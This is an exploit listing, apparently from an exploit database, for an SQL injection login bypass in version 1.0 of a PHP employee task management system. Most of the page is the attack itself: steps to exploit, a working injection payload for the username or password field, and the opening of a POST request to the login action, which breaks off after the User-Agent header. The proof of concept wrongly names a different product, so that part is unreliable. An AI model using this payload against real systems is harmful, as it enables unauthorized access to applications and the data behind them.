Exploits / Vulnerability Discovered : 2021-12-09 |
Type : webapps |
Platform : php
This exploit / vulnerability Employees daily task management system 1.0 username sqli authentication bypass is for educational purposes only and if it is used you will do on your own risk!
An SQL Injection vulnerability exists in theEmployees Daily Task Management System admin login form which can allow an attacker to bypass authentication.
Steps to exploit:
1) Navigate to http://localhost/login.php
2) Insert your payload in the user or password field
3) Click login
Proof of concept (Poc):
The following payload will allow you to bypass the authentication mechanism of the Engineers Online Portal login form -
123'+or+1=1+--+-
---
POST /Actions.php?a=employee_login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0